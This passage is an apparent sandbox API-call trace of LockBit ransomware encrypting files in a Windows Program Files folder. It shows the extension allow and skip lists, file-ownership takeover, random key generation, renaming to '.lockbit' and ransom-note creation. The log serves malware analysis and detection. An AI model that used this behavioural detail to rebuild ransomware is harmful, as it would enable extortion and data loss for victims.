lpString2=".png") returned 1 [0084.150] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.150] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.150] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.150] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.150] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png.lockbit") returned 82 [0084.150] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.151] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.151] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.151] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.151] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.151] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.151] RtlFreeAnsiString (AnsiString="\\") [0084.152] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0084.152] malloc (_Size=0x200) returned 0x77d800 [0084.152] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.152] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.152] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.152] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.152] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.153] CloseHandle (hObject=0x3bc) returned 1 [0084.153] free (_Block=0x77d800) [0084.153] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0084.153] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.153] malloc (_Size=0x40068) returned 0x3df0008 [0084.153] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2041) returned 1 [0084.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0084.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0084.154] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0084.159] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.159] malloc (_Size=0xba) returned 0x1ff1e60 [0084.159] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xba, FileInformationClass=0xa) returned 0x0 [0084.159] free (_Block=0x1ff1e60) [0084.159] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.159] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.159] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.160] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722b1847, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722b1847, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6905b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_btn-over-DOT.png", cAlternateFileName="")) returned 1 [0084.160] lstrcmpiW (lpString1=".", lpString2="Pets_btn-over-DOT.png") returned -1 [0084.160] lstrcmpiW (lpString1="..", lpString2="Pets_btn-over-DOT.png") returned -1 [0084.160] PathFindExtensionW (pszPath="Pets_btn-over-DOT.png") returned=".png" [0084.160] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.160] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.160] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.161] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.161] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.161] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.161] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.161] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.161] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.161] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.161] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.161] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.162] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.162] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.162] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.162] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.162] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.162] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.162] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.162] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.162] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_btn-over-DOT.png") returned 1 [0084.162] lstrcmpiW (lpString1="ntldr", lpString2="Pets_btn-over-DOT.png") returned -1 [0084.162] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_btn-over-DOT.png") returned -1 [0084.162] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_btn-over-DOT.png") returned -1 [0084.162] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_btn-over-DOT.png") returned -1 [0084.162] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_btn-over-DOT.png") returned 1 [0084.162] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_btn-over-DOT.png") returned -1 [0084.162] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.162] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png") returned=".png" [0084.162] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.162] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.162] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.162] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.163] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.163] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.163] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.163] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.163] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.163] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.164] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.164] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.164] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png.lockbit") returned 79 [0084.164] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-over-dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.168] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.168] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.168] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.169] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.169] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.169] RtlFreeAnsiString (AnsiString="\\") [0084.169] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0084.169] malloc (_Size=0x200) returned 0x77d800 [0084.169] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.169] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.169] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.169] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.170] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.170] CloseHandle (hObject=0x3a0) returned 1 [0084.170] free (_Block=0x77d800) [0084.170] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-over-dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0084.170] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.170] malloc (_Size=0x40068) returned 0x3d70048 [0084.172] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=2891) returned 1 [0084.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0084.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0084.173] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0084.175] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.175] malloc (_Size=0xb4) returned 0x1ff1e60 [0084.175] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0084.176] free (_Block=0x1ff1e60) [0084.176] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-over-DOT.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.176] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.176] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.176] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724a0a00, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724a0a00, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6b6717, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_btn-previous-over-select.png", cAlternateFileName="")) returned 1 [0084.176] lstrcmpiW (lpString1=".", lpString2="Pets_btn-previous-over-select.png") returned -1 [0084.176] lstrcmpiW (lpString1="..", lpString2="Pets_btn-previous-over-select.png") returned -1 [0084.176] PathFindExtensionW (pszPath="Pets_btn-previous-over-select.png") returned=".png" [0084.176] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.176] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.176] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.176] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.176] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.176] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.177] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.177] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.177] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.177] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.178] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.178] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.178] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.178] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.178] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.178] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.178] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.178] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.179] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.179] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.179] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_btn-previous-over-select.png") returned 1 [0084.179] lstrcmpiW (lpString1="ntldr", lpString2="Pets_btn-previous-over-select.png") returned -1 [0084.179] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_btn-previous-over-select.png") returned -1 [0084.179] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_btn-previous-over-select.png") returned -1 [0084.179] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_btn-previous-over-select.png") returned -1 [0084.179] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_btn-previous-over-select.png") returned 1 [0084.179] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_btn-previous-over-select.png") returned -1 [0084.179] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.179] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png") returned=".png" [0084.179] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.179] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.179] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.179] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.179] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.179] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.179] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.179] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.179] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.179] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.180] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.180] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.180] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.180] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.180] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.180] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.180] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.180] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.180] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png.lockbit") returned 91 [0084.180] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-over-select.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.181] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.181] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.181] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.182] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.182] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.182] RtlFreeAnsiString (AnsiString="\\") [0084.182] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0084.182] malloc (_Size=0x200) returned 0x77d800 [0084.182] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, 